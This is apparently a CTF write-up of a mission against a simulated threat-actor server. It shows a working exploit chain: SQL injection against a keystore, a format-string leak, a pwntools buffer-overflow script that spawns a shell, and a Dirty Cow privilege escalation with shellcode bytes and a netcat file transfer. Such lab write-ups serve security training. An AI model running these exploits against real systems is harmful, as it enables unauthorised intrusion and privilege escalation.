espenfjo@home:~$

NIS Cybertalents CTF Mission

The mission task is vaguely unspecified compared to the basic tasks. It consists of six subtasks:

The README file gives a good introduction to the mission:

Situation

We have received information that a unknown threat actor have gained access to servers connected to one of our ministries. Based on current situational understanding there are little details known about the chain of events. The threat comes from an actor abroad, LIKELY an actor with massive resources.

Initial analysis shows that the actor exfiltrates data to the domain cloud-c2-70, on port 1337/TCP. The format is unknown.

There has also been observed traffic connected to the actor against this URL: http://keystore/query.php?keyname=oper@cloud-mgr-15

Mission

We need information about the threat actors capabilities and intention.

Initially we want to know who uploaded keys to keystore.

Further on your task is to gain access to the server cloud-c2-70 and try to uncover what has been exfiltrated in the operation. Information about the threat actors tools, infrastructure, certificates, and keys will be of interest.

Keystore

So lets first look at the keystore. The initial hint gives us information that there has been observed traffic to http://keystore/query.php?keyname=oper@cloud-mgr-15.

Querying this address gives us one ssh pubkey back:

$ curl http://keystore/query.php?keyname=oper@cloud-mgr-15
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRxi+RiZUVctodSwECa+ExkRlEUGlhLhX5c5drIAWmNeHW29mROl3D0smZFGvf5WSq7ff/BqKagWSBnUt2ImF0oAOVOJ8UBnCKAHWEZxg3eCzjdJhlWrlRdFO+HzHQWVrM9q7RahtWgXIgLys4lgZI5paaEvRBCnCLLnqFmzN4sFSzBsHAImx+rJzFgCT3XFs5gd5lGg7vCRGrjZsZzCAYbfYeYgge4TCk8IeCw1pwhbkKtV6mRlFI5j0IUyqzHUu/Hnj8EK/4eH8cmSOi+9rUKB3yoxxzqfBAH+bkITdhZ/O99qW4bTbEiONVVuleeTKqwRixTg3GEJHGQQNiXxur oper@cloud-mgr-1

Fiddling a bit with the query parameters seems to give us a list of all the keys in the database:

$ curl "http://keystore/query.php?keyname='OR'1"
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAE3r77TKxuqqUD+muVK0BPp3eQ0PKrogy6zpmWtK0rB48lOMjiPb2gKiYehuFFHiZev8H/TRDjoffVwKCAWKD9TF4o6Anj3T8SEUi88gXR9vXqoRr9T86eY+HaVv1Lt39+NW+1qmHvqUJ43EAJd9/Liga1+7CZ/A0kAWHfglrC7ABhYDVz6QPkTFNxWqHM8I769FQcsezD/Kk8T/fQZQLnxfwW54z4Yexy0W2A3xZDzuamDtW0szkkBONnRynNYHJ6Xkjfw87xxd0OtwS3dwvydJ/MyxnTeEVH1m4bsj0rZJutsYl/vKkw+ieojOrA1+laXC2DDQfPk2N+x/WCQLWMk= vault@laptop-mgr-46
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdNs2G40fwpq2rGXn5QCwz9NxGdAhJCBkcpLPSh5i9rNpHKsbcupmpmT4yaqYjF2EBJrG6/yJhKKwdxOjt3gawExzlR3fymkeXZ9L8LcTcSgD7h3tHWsjnSGER1XyHN8QMUcO0jD26VRPXE2nnSDdiW6c5p+xm6YQHjnGM+WH37yO+87chbURSujZSWELixU/rqL7L5dSuXs0gmFB9DWcIHW8Atuk5awyzAV4LkNn5sKySv+wIwoPbL7TuY9sBRXZFLJmHHLKd1I3Z1a002jqd1vuxAk6CXI4oU9uxMynpDSYG/8vu8ebEzGpXBYnzlQwlAohldfiDQy1hJN4X5lqV vault@laptop-mgr-21
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAGWCDRRlJQIHip1MPnov5rh5DMrWO8aE7Ow6dpCdEr7D2V+Cw95eu1Uw8QCjAjiHwu66hQnZT4F7ybu+UV6LesBzoHZhC99lAtyzfnS/EqEhIHOREj9zq6ECrj/zCmQm48cGwV+2eOMLRbjBnQEQGTvVK5XaWwWNGmND41mRDQoZU7UA0uNsU205yU7Pepbg8hPCJ7iedv5a97Gl5Gi6VI35FjJo+srE0/ANR+2F51GlGWiaIDlWq5jiLw1IOCt7cw5ZWEmV+mNlXTEsLTIiyoJymUct6nvRIhjvN4S64snLhvZXSh363JfQRnGSNpi5aDsyYQSLC7xBAGPVJw0tU9U= lootd@cloud-mgr-46
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9ba30K6tnVLrM6M1uSjMpi5LszJj7TSrT4RYVt+kpB9Jy2jo00XgvW7eoEBysiq83tGtN9xoVIIRh+I0iVmEbL5t76BITAH8FJrqPYqjVXIQ3huhFgzqqtjPaRb0V1NWKcVbk0KNuEgia4ZIBvL37ZA26HGEndoum46dvbgvEa6nnA5dQQIBsZMz7uZ0reABKuHEbNJ1FrBAiCn7Lcoql6hu2seO+bPuxogSOeNHA1xIK59B9d9K/W8f2LSVT/icp1qPojLHekJBR47IWXYkVSsanPnk8Q4fimopjfe2aIfl8pASjjSgjRdE4dFmEvPESB8q1K9dynZv23MZG1FsJ lootd@cloud-mgr-26
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAQ7DBO12lh70hlPg6xlKP5tqwVhu0jPRIQMIKEFfWlGAw+8KxD6t9PfgYynGduTBPlv8yNGlgDoWO+e0ohhGNPJbl9mSGXIY1WiLaGpsYiV43LjKGdxSm9eS0EV5QUCTrHhLzXnh0eqPbWot69cZSRVAFDciTHf4Ura6JdW+DVLZ0X/zEc+MhNNAPEtsaqzrhcfCjx0PDEUVEKe0UiD8Q8RWzNfKDutaTrMyb31posw8pjXopRiUvXHAllepv/xPysBOwpAh9MZxG5TQXIOp6y2z6TCi+J8LSPg33nQ4g7V0XqcO6VOGiuYbFa9sX4KLBLY8KgVdymPAfHl+NPjzb vault@cloud-c2-54
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEW99osiPFdIlDoYU4QT8hLMBZ+OziXXnrKOYNdL2Qdw nadiah@localhost
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUO4Q8Nbmu1mMnGJK5B5cKXPBlKoQAZa8Ai67BhVtZ6I3MgesMgej0dok9kBaZpWbQJ2l82KVlEpEzto2+xeaMG+8kK1a+Wxd9dVLI/R9KWGkxs0/Yxl1Wil/FZ5uniEMANvhaK9H3gzxWp2x5ly+yEBLMtwQFWh5RPKfRKTnqPUHiUBHqDa3t+jV7XOo665NhQ9+cgEM6XzRLMyj4ofnQV9GoksQGZCBm1u3jA4Mlh9V6Smf+FRvf0gVl+fw+qd8NW3DLsw5XIpp+xhIatoL4I8yW7G7WytZt3+DIac+IHUbbHkF+HzaSzyRsDif2qNJye/7cVrgkszVzd9UlkR31 vault@cloud-c2-64
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCdsvsci5IVdBPdi0Du8E+xp3jh4aWDx/QjzFwPXuQtTG1GODOuCVwYLufcqNdDrdaTe7GBRa2xLFuzIX1oYUy+a4dNDJuJHYdLi7Cw33ejVsro13b4DQEFm85S11zmVmgvv0dHiy+KrNixPrDV/nRfYQQjxmc3/P0TPJcDGVNOmO9J0/v3ujroBjI8+gpuonqN3e+xvmLRzdxdNXW4VENpu0vI86FfBZ0tkrCdYMrSn80jn/5uVEJPynBildlJCp0iBSvqmkOOu994EhTlgnrIfzQJKdMGIy1gv93wcJxk17HiYgM8KcVe3AYlmWfdrwC8P4bLif63+dqyQ6kWNz37 vault@laptop-cache-51
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCjXMUP1QAV+yJBPhdHy7NdbX9HwyfRzhmXF4HiBCxpJbRnetnOtZs1TGDwOptk61AdBNNAwoHc7knRt4p+MYiBx9FVrAxqu/+hPn5rlKWJKB/wCt247bx6ThLKLRg1r2wtSd9qQX7cXB4d3OZly+1A3WdGoooWECFJBhHFcnvjZ8KxljO3FfCkfe9z6vQOb+Sf/rE9yYrPh1eoRg9d2YpwEY+4uJR56CFeEAI/LDITbV6mbDwh8xl5ruu8MSs9tdu10HWihmCAZyvCT4FcIA+q/r/a18aodwUqxVNAYX0GS2MoLJuqRY1Y9s6qmxvCyOj4kM560kaz80nuULS+kkuP oper@cloud-hq-42
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0Vw/yUrmjlVfzasi3S9gJiWHvePja3M9LyDm/UEU54HtFgh/VylsLioqeQUUDkfPKzpZ0FgDPVFehPGnuft5wb3eF6bf/SRV1zbhJChaseCziWitR+4A/Fq6bQZx98S6bZi9usfGrVw1CCD84jNETGYO5TgfbhauuK/ECvupU7KfdNr/SK2bzyYH8FZrKrPuP3ZzruojTnIAF3DxlYcF0zSZuj+j31IbWdKOdtx6B/1ydv7yJcBl/XAjBGssM0ytyYTeI7L0qSgCTUbyteJ0hy4OYUTUB7mCEnNQIMuknITMK9fKPtUCReh6HwyEuNS4M2uVQVvyr7Xsk2CU77FxP lootd@laptop-cache-84
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRxi+RiZUVctodSwECa+ExkRlEUGlhLhX5c5drIAWmNeHW29mROl3D0smZFGvf5WSq7ff/BqKagWSBnUt2ImF0oAOVOJ8UBnCKAHWEZxg3eCzjdJhlWrlRdFO+HzHQWVrM9q7RahtWgXIgLys4lgZI5paaEvRBCnCLLnqFmzN4sFSzBsHAImx+rJzFgCT3XFs5gd5lGg7vCRGrjZsZzCAYbfYeYgge4TCk8IeCw1pwhbkKtV6mRlFI5j0IUyqzHUu/Hnj8EK/4eH8cmSOi+9rUKB3yoxxzqfBAH+bkITdhZ/O99qW4bTbEiONVVuleeTKqwRixTg3GEJHGQQNiXxur oper@cloud-mgr-15
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCXshQaiVZgs27O765SM4FU+gViJuXkuv0OMd1NNtFQaMFCEaa+d7GWfG0bv6izSVo1ghbDfm3pH93MqArUB45trs/oLX0RTNqzqXAhNCzBRZk8rsi8NmYfnnMHgoL6+TwRVElLsO9UJ/g+ahak1AR1BKdAabX/G0FfiPiYxu9y0xQcDQGBCERPxZsGkOhUwwwvkqnqJoqGgWbE4JoE6cdnsRpZ+HqVB92esR6ASxiico5nI+kkzU3q7hCeNBagOCFzcBpEryiTDtQkF2MCV8CU9UOSna61bas2O+pbMvGpP6ZEdT4Eh0Zp4gi54yRoPwD0/10D0LIttgvlyumTZjqf lootd@vps-c2-40
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCaSUFSNmKUuzlnhAWRKl+5GFLcvTTNBf96MXnJQo0VtfMqhm+D3SGcyoL7a4LDNQSQz0d51fnC9g0u4sUDsATjcqKkWIDKX/dJ+/MYgichEviS+8aUSCwV0ebf1XTeRVF5IC27irV8nzuOAtTPsQfrFJsrxKNPN29n8xGu4K/GpRPoHYqQJHK8hjvBtPfBQMTg2l1ZL9NnCzl3iBZpZpzs61a/yzyIYSwdTRziIQQc3klUYJtV8Ps5FPF2r2ejH1nleiw2b/CgGegi3JXq6axebl4NiXIPGinaL7fnSArk3ReAJT53luTPwgjdwgdMazhak/3HqT2nds0FlDqg4zmb vault@laptop-mgr-58
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABADZOrVfFjESstqajNdhzwn8wlQ2zLsz9Gj5Dp1KMK6BSHULRYEpQtyPpatlPdhGgALRLYtjonjfR4LAt0asyPSPbNu7gAWALNlS/xF2iHUqiMxxj5/r4Xj8hfp7XD2TGxlVZlw5xW45t7LIVr/f1iFiWXcj6xqXzkdSKFoev43hsdt6bMYEZKdEN2Y+1w1KlKUFOWh/3yms2C/WItVJMSWeYaZcxG02JXTZFLFVAz3IryQRaVQlVizVlDGKt25wzVmTzVjAQoF9QusM7kAxcuSB8f5etGN+oPltHCacTLC6Dcn5E52mtb+xIvT5nrof6va+Zzy8Pa5nJTCEsRGihLGk= vault@cloud-c2-70
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEW99osiPFdIlDoYU4QT8hLMBZ+OziXXnrKOYNdL2Qdw arjen.lenstra@localhost
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAEMLTzLPdHVG9z03S2vfehLa/2DcTlJYecNu0uCNdUgpuiS2H3RNmVPxUKsGNgB4lisNJ5AGq2TKuKNC9tTC+rTF0ZKo0SvQUl5Qc0ySoMo+kZvwEka+S2aJxFXdDH8AyYNBy73dtRFbzdo/TUp5ULpiNxAmNpNsqej/V+X69PfxUhNvyub19phTFWFJtLnU8CgJbyRtGWjtbulkl8kDXYx/a02G6vMiUHZHhvXNrMVDr9fRGEn9Bc00mizmOkehTyVR/w9rNNHE/y99SOJXEEwLJ5Sq/1Y7RodYbZATfFL/ycbaqOi5g7cBhmjZA5VkiuovFEfNrbctd504v7wl+rk= oper@laptop-mgr-79
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXfsYexqLR/U5AsndUVPJ1zsWSkGAQLOZiOyKnhLkiVM1sh5Z46a4+ZKGc7TSaTACKKfd+cwB11EL3z/W0AiaOT98S2uv25V7ZUvHQE0qXo5KgVdxUqYPLra3hTDqcHfgBz2Ge8etASE+jwlQ9V/szc2oihHnNhtGSE8pGqa4zNsGKYTAJiG0qdg46HgcsZeoG6ArxfNTvy6hsFwt5aI7RD59WzGdW+3pwgBe2rg0fXOoV49ZFCF+3Ef0zIpDxGV9/F4E/uHRqQ4syIQkcuYNsZ6v2KN5aJaMEpKuGidukp+aQe7iovemRsbSA87WbDITLc2jT8OwIA16/lOLlO9N1 vault@laptop-c2-86
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAEj0NPpsmMhctkAa36yx+MR6uFuS55mHyIyerpvnuDcHIXb/hD522j8QOFJS3pwj1trDPOL55aMC30m1otr+eeK95UnZj2xtubyPiXL7tZQFJfraelBCaRz6Kf0GWN7HSdAWGSxJ0Npr5nteAtcHPRqx4SMnTfEn9J3Vh4GJUc0Mo597qQT6nQFYhTdJrUl2D0zqdVlY/6bLSXgF83bXFYPpk4UpGW7azL8Qr5eBZWBXadzYvPWdhT88NpHRx8bfpw4u3E/a3N/WCr1Ry6B4KhBtrvkSbSHn5fcM34hXwo9eJV2sr16zoq7CY2C9XL/kyp9bH/AQPPfHP5oJ9VWRJgk= oper@laptop-c2-25
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAE6TrdELYMzOjf8ZLqCJaP11oumuoNvRiDuu/NbpXDTCK6catMg/zHTDziOxHxwQd38nfr3HUF9K+TWCr7Rne6nsyHATWpcY2aBIQIreAD4JnGUgJ6ZlcuuGRkVlJtEc+UXc7CkzHVFat2NqbvM2mu11IPjTB80PdCEDAN2TVVtv+q2rPpTLtBkPWyRJX6g2POt+z9DjK1xpGdi6c80LzHtIsrog81iW1fmSvejwZNC+NZqeSlYIZf6kqtdq7vx5xNuYpSV9ajELoMjySG3YGENqejDAFPQOGu33V9LJtkDaH3L2HnxeXtKZxAry017bCI7eqsxmOH6K0SJaRgp6dVk= oper@cloud-c2-57
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAFyOYKiX0NxY7XU37SPrp60gkkdd5V7Cm4xx6toIoP5cAGfboG12KKs+zDszyYlvEDRT8NgauuylF8J7LVI8C59G6cdtgovw1FA0eojBi+b1SNopLcWRoDDSB0xBWKGcMNbxRkgKknSVM+bDunaKRIdwEdz1jK6mebGzj1aTADubPfvPEt5C5hwKI8v4+VqtUyVG5zx7kYOyKVCUO+qPCW3Gs1rCmYDFd7zrMl9dyAhMTINUeBJkHD+rrfrBYJ3XCGTzG03CDKKte5RJywE/I00wNHJTATqfiuLoWfm6gugCXEeuvpMlJ+jfzMoR9vmeW5I6pELbn4wv5W4VAAcL7nM= vault@laptop-cache-1
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZxGzQI7SFNQdKFCujuiMHf0j9nqfaQYZ8RsD/eMBcd1B7qtoP4YPrwP2XTr0TcRW7zuw0HMfd4PkcqFOpCvWELF56zTqrbYQg5CCRYyKwrQfVTuizLt0v+uN8DiOQK8HRZ4DeoU4wIWYmH/ep/ZQNS4RQ8g9RnbjNnJe1hn2iSlguA9ToT7OkGuhe59f/gBdzZQJA3MFtmhIc96zwH+5LyoJyYt/6U/j9ApMSHO2XeacbZvQOOkSo29MX6LRQmQcEYmrl6u4Lc+0NFdhMbacc6YHkpw9Wf48I27Uf0rptHJF/HaeXT2AZjU1m8dLC5/qDnPvdJVPRLZO9wljRp04R vault@cloud-cache-73

This confirms that the system is vulnerable for SQL injection attacks. But I forgot to log my queries to dump all the various tables.

lootd

Connecting to cloud-c2-70 on port 1337 seems to give us a very limited shell, or rather it spawns the process lootd and connects us to it:

$ nc cloud-c2-70 1337
> ls
./lootd: unknown command: 'ls'
> id
./lootd: unknown command: 'id'
> ?
./lootd: available commands: help, upload, download, uname, uptime
> uname
Linux bovinae 4.8.0+ #1 SMP Thu Oct 13 20:07:36 UTC 2016 x86_64 Linux
> uptime
 13:48:33 up 1 day,  6:06,  load average: 1.90, 1.94, 1.99
>

Trying to download arbitrary files asks us to supply an access token we do not have.

> download
filename > /etc/passwd
access token > password
done. 0 bytes

However trying to download lootd itself gives us the contents of the file:

> download
filename > lootd
00000000  7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 | .ELF............
00000010  03 00 3e 00 01 00 00 00 90 11 00 00 00 00 00 00 | ..>.............
00000020  40 00 00 00 00 00 00 00 80 31 00 00 00 00 00 00 | @........1......
00000030  00 00 00 00 40 00 38 00 09 00 40 00 18 00 17 00 | ....@.8...@.....
00000040  06 00 00 00 04 00 00 00 40 00 00 00 00 00 00 00 | ........@.......
....
00003760  b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
00003770  01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................
done. 14208 bytes

This lets us disassemble and decompile lootd to better understand what it does. By looking at the file I can discern at least two severe vulnerabilities:

  1. A Format String Vulnerability in the command input
  2. Buffer overflow in the upload command

By utilizing both of these we should be able to execute arbitrary code. Since the server utilizes ASLR we will not be able to re-use memory addresses found by exploiting the binary locally, luckily we can use the Format String Vulnerability to leak addresses on the stack:

$ nc cloud-c2-70 1337
> %016lx %016lx %016lx %016lx %016lx %016lx
./lootd: unknown command: '0000565121fd40e7 00000000ffffffff 0000000000000000 00007ffe44471aa8 0000000000000000 00007ffe44471cf0'
>

From analysing the binary locally we see that 00007ffe44471cf0 is well onto the stack, and we should be able to use this address together with the Buffer Overflow vulnerability in the upload command to execute arbitrary code. Lets create a small python script to help us with this.

#!/usr/bin/python3
from pwn import *

context.update(arch="amd64", endian="little", os="linux")

r = remote("cloud-c2-70", 1337)
r.sendlineafter("> ", "%016lx %016lx %016lx %016lx %016lx %016lx")
stack_addresses = r.recv()
address = stack_addresses.decode().split(" ")[8][:-1] # we are only interested in the last address
log.info("Stack is at: ", address)
address = int("0x" + address, 16) # Convert to a hexadecimal number
log.info(f"Nop Sled size is {0x100}")
log.info("Lets try to point RIP at (Should hopefully contain our nop sled)", hex(address))

buf = b"A" * 72
buf += p64(address)
buf += b"\x90" * 0x100 # large NOP sled
buf += asm(pwnlib.shellcraft.sh()) # Use pwntools to create a shellcode to spawn /bin/sh
r.sendline("upload")
r.sendafter("size >", buf)
r.interactive()

Running this script gives us a shell and access to the first two flags:

$ python3 shell.py
[+] Opening connection to cloud-c2-70 on port 1337: Done
[*] Stack is at: 00007ffc15e02430 
[*] Nop Sled size is 256
[*] Lets try to point RIP at (Should hopefully contain our nop sled): 0x7ffc15e02430
[*] Switching to interactive mode
 $ 
$ ls
FLAG
lootd
$ id
uid=1000(lootd) gid=65534(nobody) groups=65534(nobody),65534(nobody)
$ uname -a
Linux 976a797be6b3 4.8.0+ #15 SMP Thu Oct 13 20:07:36 UTC 2016 x86_64 Linux
$ cat FLAG

  ....                                                   . .  .
 .<X1|:                                  .____==i|||i||*|||+||+||||||==,_,
  -nc=___..               ...____=<|||ii*||+||+|=;=;;;;::::::.:......:==+:
   de.:=+++||||||||||||||*|||++|+|======;=======saa=;;;::::.-.-..-..:-::::.
  .3e....---.:-:-::::::;;::;;==;=;=============qQQWmgc:;:::::.:.-..-.:::::.
   de ..:.-.:---::::::;:;;=wmQw>==============)QWQWWB(:;:::-.:..-.-.:.::::
  .3e...-.:.:.::-:-::::;=wmWWWWm===swwmQQmQmywUW@Y!+;;;:;::::.--..-.-:::::
   de .-.:.--:--::::::;;=YV#B$WB$mQQWQQWWQQWQWWm>:=;=;;::::---.:.-..:.::::
  .3e...:..:.:.::-::::;:;::;;;vmQWQWQQQQQQQQQQQWz===;;;;::::---...-.-:::::
   de....--.:.::::::::;;;;;=;=mQQQQQWWQQWVTTVWQW(==;=;;:;:::.:.-.:..:.::::
  .3e ..:.---::.::::::;:;;;;;=WWWV!++<WWe;===3WC====;;;;::::.:.-...-.:::::
   de....-.:.:.:::::::;;;;;;==)Wm====wWWmwaawWB=====;;;:::::-.:.-.-.:.::::
  .3e...:.:.:.:::-::::;:;;;;;;;3QQgmQWwamWWB#mmw>+===;;;::::.:..-.-.-:::::
   de ...-.:.::.::::::;:;;;;==ammm?WQQWWWBV|?HWWQWQQmc;:;:::.:.:...-.:::::
  .3e..--.:.:.::::::::;;;;<awmQWT+=<I2X3*!+===)QWQWBT(;:::::.:...-.--:-:::
   de....:.-.:.:-::::::;=mWWWWWC======;;=======!VHV(:;;:;::-:.--..-.--::::
  .3e ..:..:-:-:-:::::;::??$WWD(;================;;;;;;::::-.:..-..-.:::::
   de....--.:.:.:::::::;;;;+!+=;;=;===========;;;:;:::.:.............--:::
  .3e ..-.--.:.::-:::::;:;;;:=;;;;;:::----- -  .                       . .
   de.   . ................- - . .
  .3e;
   de.                                                            ╭──────╮
  .3e.                                ╭───────────────────────────╯ FLAG │
   31.                                │ 3f8762b6ff18b83da8767251dbf05fc5 │
  .3e.                                ╰──────────────────────────────────╯
$ cat ../FLAG

   ._s,,, ....                             ╭──────────────────────────────────╮
  idm###mqmmmmmwos,                        │ bf54b6ffcdd9309b884ad922ec961611 │
 =dXXm#WmWWmWBWWB#qwwwwwaa%,               ╰───────────────────────────╮ FLAG │
 =IX#mWWWWWWW8#mm#mBmmmmWmmmms,                                        ╰──────╯
 .vX#WWWWWBAqmmmBWWWWWWWBWWW#Sooouaaas,=_.
 :vXZmWW#SqmmWWWWBWmWBWWWVSowX####UZZX###Zqai,
 .vS#m#Sw#mWWWBWWWBWW@Ynud###mmmmmmmmm##UZZZXXoc.
  =3ZUnXZmmBmBmmmBWV1um##mmBWBWWWWBWmWmmmmm###ZXoc.
   +YvXXmmmBmmmm#SaX###mBWWWBWBBBBWmWBWWBWBBmmm#mSo,
    =oXZ####Z#ZSnXU###BWBWmWBWBWWBWBWBWmWmWWmWmm#XSo;
   .iXX#XZZZZYvdX###mBWmWWBWBWmWmWBWmWBWBWBWWmBmm#Xdm}!*Ynowaas,.
   .{nSXXZXX1nXZ####mWmWWmWBWBWWBWBWBWBWmWBWmWmBm#X3Qc      -"!Y$ma%.
    +ISoX2XlnXXXZ##mBBWBWWBWmWmWBWmWBWmWBWmWBBBmm#omQm.  :-::.   "?$mwc.
     ={nXXlv2SXX#U#mmWmWBBWmWWBWmWBWmWBWmWWBWmWm#XmQQk  .::::;===;.:+9#ms.
       +{1vn2oSXXZ#mmmWBWBWBWmWmWBWmWBWmWBBWmWm#ZmQWB^  :;;;====+|||=|IVWm;
         <vv1noXXX#UmmmBBBBWBWBWBWmWWmWBWBWmWm#mWQWB(  ;;===+++||+||iiiI3$Qc.
        .|ivn12nXXXXZmmmmWmBBWmWBBWBBWBWmWBW#mmWWWZ^ .====+|+||||iiillvIvXWmc
         <|lvvn11oXXXX##m#mBmmBmBWmWmWmBWmm#m#mWmZ` :=+++||||iiiiilIvvvnnoXWm;
         :|lllvn21nnXXXSXUZ####mm#mmmmmBmB#X#mWWZ` ==||||iiillvvvvnvnnnoooXBms.
          <ililivnn11noSSSSXXZZ#Z########&SXmWW#^ :+||||iIvvIvnnnoonoo222SXmmc:
           =illIilvvnonnvo2S2SXXXXXXXZZZZoSS#WWE..=||iilivnvvo22ooSoS2XSSSXm#i;
           -=|iillilllvvnnnvnonoo222S2SSSnnX#WWh..||iilvvnoo2SSXSS2X2XXXSXZm#|`
             :+|i|illlIIIIvvvvvnvnnnnnnnnvIvXWWm;-||lIvvvn2S22XXXXXXSSXXXX##e=
              -=||||||iiiiillIvlvvvvvIvvIliiX#WWz <ilvnnoSSSSXZZZZXXXXXXZZ#Zl;
                -=||ii|i|iiiiiiiiiiiillili||{X#Qmc-ivnoSXXXZZZ##ZZZZZZZZZ#Ze>
                  -=+|||||||||i||i|ii|ii|i||=|3#Wma=voXXXZZ#Z##U#Z#ZZZZUZZ2|
                     -=++||+|||||||||||||||||=+*X#Qmwu1XXXZZ#Z#ZZZUU###XX}>
                        --=|++|+|+||+||||||||||==|YXWBmguonoSXXUmmmm##Xe|~
                            ---==++=++=++++|+||||=;=~"?VHWmQmmmm###X1*~-
                                    ----~~------~~~~~~~---++++||+~--
$

Looking around on the system give us several clues as to what has happened, and what has been exfiltrated and to where:

$ ls -l /vault
total 24
drwx------    2 vault    users        20480 Feb 12 00:42 loot
$ ls -l /usr/sbin/moveloot
-rwsr-sr-x    1 vault    users        14112 Feb 12 00:42 /usr/sbin/moveloot
$ find /home
/home
/home/FLAG
/home/lootd
/home/lootd/FLAG
/home/lootd/lootd
/home/oper
/home/oper/bin
/home/oper/bin/crypt0r
/home/vault
/home/vault/.ash_history
$ cat /home/vault/.ash_history
curl -o /tmp/xxx http://keystore/query.php?keyname=oper@cloud-mgr-72
cat /tmp/xxx
rm -rf /tmp/xx
exit
find /vault/loot -type f
find /vault/loot -type f | wc -l
du -ms /vault/loot
curl http://keystore/query.php?keyname=oper@cloud-hq-42
vi id
tar cz /vault/loot | ssh -i id oper@cloud-hq-42 lootimport
rm id
exit

loot

loot the hard way

Luckily for us, the kernel version 4.8.0+ is vulnerable to the infamous Dirty Cow (CVE-2016-5195) attack.
Their webpage tells us that we basically can do what we want:

An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. This flaw allows an attacker with a local system account to modify on-disk binaries, bypassing the standard permission mechanisms that would prevent modification without an appropriate permission set.

Since the /usr/sbin/moveloot binary is setuid we should be able to gain access to the vault user, and therefore to the /vault/loot directory.

Lets try..

I am using the cowroot.c exploit, and a shellcode generated by msfvenom to overwrite the binary with chmod -R 777 /vault. I could have spawned a shell as well, but lets try something new…

I modified the shellcode generated by msfvenom to set my effective userid to the vault user, and change the setuid binary to exploit to /usr/sbin/moveloot.

unsigned char sc[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  0xdf, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x01, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0xbf, 0xe9, 0x03, 0x00, 0x00, 0x48, 0x89, 0xfe, 0x6a, 0x75, 0x58, 0x0f,
  0x05, 0xbf, 0xe9, 0x03, 0x00, 0x00, 0x48, 0x89, 0xfe, 0x48, 0x89, 0xf2,
  0x6a, 0x71, 0x58, 0x0f, 0x05, 0xbf, 0xe9, 0x03, 0x00, 0x00, 0x6a, 0x69,
  0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99, 0x48, 0xbb, 0x2f, 0x62, 0x69,
  0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48, 0x89, 0xe7, 0x68, 0x2d, 0x63,
  0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8, 0x19, 0x00, 0x00, 0x00, 0x2f,
  0x62, 0x69, 0x6e, 0x2f, 0x63, 0x68, 0x6d, 0x6f, 0x64, 0x20, 0x2d, 0x52,
  0x20, 0x37, 0x37, 0x37, 0x20, 0x2f, 0x76, 0x61, 0x75, 0x6c, 0x74, 0x00,
  0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 223;

Quickly compiled the binary and transfered it to the server:

$ musl-gcc -pthread -static cowchmod.c -o haxxit
$ cat haxxit | nc cloud-c2-70 1447
$

Beforehand I spawned a netcat listener on the cloud-c2 server:

nc -l -p 1447 > haxxit &
$ chmod +x haxxit
$ ./haxxit
$ ls -l
total 12464
-rwxrwxrwx    1 vault    users         2063 Mar  2 20:25 FLAG
-rwxrwxrwx    1 vault    users           32 Jan 16 10:24 key
-rwxrwxrwx    1 vault    users           39 Feb 11 23:32 seq.0000.zavzlqdyoakhcdqzacqdiamtytleoljooepzwuzlwluyokxppnsxpgqobbuppdfd
-rwxrwxrwx    1 vault    users        65536 Feb 11 22:45 seq.0000.zeicfgrnvksuptofqkcopbgbbppogemfiujncbdynvsdqgigqnwhqcktubicfuhn
-rwxrwxrwx    1 vault    users        65536 Feb 11 22:45 seq.0001.zeicfgrnvksuptofqkcopbgbbppogemfiujncbdynvsdqgigqnwhqcktubicfuhn
